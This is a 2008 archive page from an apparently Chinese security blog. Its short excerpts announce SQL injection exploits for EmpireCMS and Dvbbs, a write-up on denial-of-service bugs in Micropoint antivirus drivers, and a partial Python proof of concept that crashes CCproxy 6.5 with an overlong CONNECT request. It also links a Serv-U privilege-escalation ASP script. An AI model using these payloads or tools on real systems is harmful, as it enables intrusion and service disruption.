2008年10月 的日志

EmpireCMS47 sqlinject

2008/10/01 16:25 | 鬼仔 | 工具收集 | 消灭0回复 
<?php
print_r("
+------------------------------------------------------------------+
Exploit For EmpireCMS47
Just work as php>=5&mysql>=4.1
BY  t00ls.net
+------------------------------------------------------------------+
");
 阅读全文 »
Tags:

Dvbbs·php Version 2.0++ Blind SQL Injection

2008/10/01 16:25 | 鬼仔 | 工具收集 | 消灭0回复 
<html>
<head>
<title>Dvbbs·php Version 2.0++ Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
----------------------------------------------------------------------------------------------
- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit  -
- Info ---------------------------------------------------------------------------------------
- Author: oldjun -----------------------------------------------------------------------------
- Exploit Coded By T00LS.NET -------------------------------------------------------------
- Site: http://www.t00ls.net ----------------------------------------------------------------
----------------------------------------------------------------------------------------------
*/
 阅读全文 »
Tags: , ,

微点主动防御(version20080924及以下)多个拒绝服务漏洞及内核BUG

2008/10/01 16:04 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011

国庆无聊在家,下了一个0924版的微点,从它的HOOK一个个看起,看了4个就发现两个有问题~~再看看,发现有问题的函数几乎是一半对一半~ 多达十几处。还只是简单看看地结果~太挫了

现在说一说其中两个~微点赶紧改吧:D

(1),驱动对ZwOpenEvent的HOOK存在拒绝服务安全漏洞,任何权限用户可以使安装了微点的系统蓝屏

问题在于微点的Hook驱动mp110013.sys对用户态调用ZwOpenEvent传入参数检查不充分导致的
阅读全文 »

Tags: ,

Exploiting Windows Device Drivers译文版

2008/10/01 15:58 | 鬼仔 | 技术文章 | 消灭0回复

来源:SoftRCE.net

本来是打算在昨天发布这个译文的,但是由于一些翻译上的问题和联系作者版权的问题,导致了译文发布的延迟。这次不一定是最完美的版本,但是大家先可以凑合 下看吧。这篇文章是作为上手文章而作的,是配合着前段时间某个paper一起出来的姊妹篇,不过同期的姊妹篇不打算翻译了。文中提到了两篇paper也有 打算汉化的想法,不过希望不要是无限期拖稿了…呵呵。高手是完全可以无视这篇文章的的。

文章中如果存在什么错误,欢迎在回复中指出。

注意:文章中的代码可能存在一定破坏性,是请使用者酌情处理,以上。代码可能由于合并转换导致存在问题,请自行修正。

下载地址: BRSBOX | RayFile | Box.net

CCproxy 6.5 Connect BufferOverflow POC

2008/10/01 15:57 | 鬼仔 | 工具收集 | 消灭0回复

作者:Friddy

#Author:Friddy
#QQ:568623
#Email:[email protected]
import sys
import struct
import socket
from time import sleep
prinf “CCproxy 6.5 Connect BufferOverflow POC\nResult:Crash\n”
buf=(“CONNECT “+”A”*1100+”:443 HTTP/1.0\n”
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)\n”
“Host: www.friddy.cn\n”
“Content-Length: 0\n”
“Proxy-Connection: Keep-Alive\n”
“Pragma: no-cache\x0d\x0a\x0d\x0a”)
阅读全文 »

Tags: ,

Beat the google search

2008/10/01 15:53 | 鬼仔 | 技术文章 | 消灭0回复

前段时间发过一个另外一个绕过的方法(defeating google dork limit ),但是有同学反应失效了,现在有了新的方法。
TR用这个方法弄了个页面放他blog上,我也弄了个放在我blog上,唯一的区别就是TR的是黑色的,节能型,我的是白色的,浪费型。

我的:http://huaidan.org/tools/google.html
TR的:http://www.pcsec.org/google.html

来源:Web安全手册

Beat the google search
阅读全文 »

Tags: ,

su提权通杀asp脚本

2008/10/01 14:39 | 鬼仔 | 工具收集 | 1 个回复

鬼仔注:备用地址

文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)

一直通杀到su7~~(这句是落叶说的,我可米说…….)

用来加ftp帐号的……本来想多玩会的.死J8头.

Download: https://dl.getdropbox.com/u/216079/servu[Lake2].rar

Tags: ,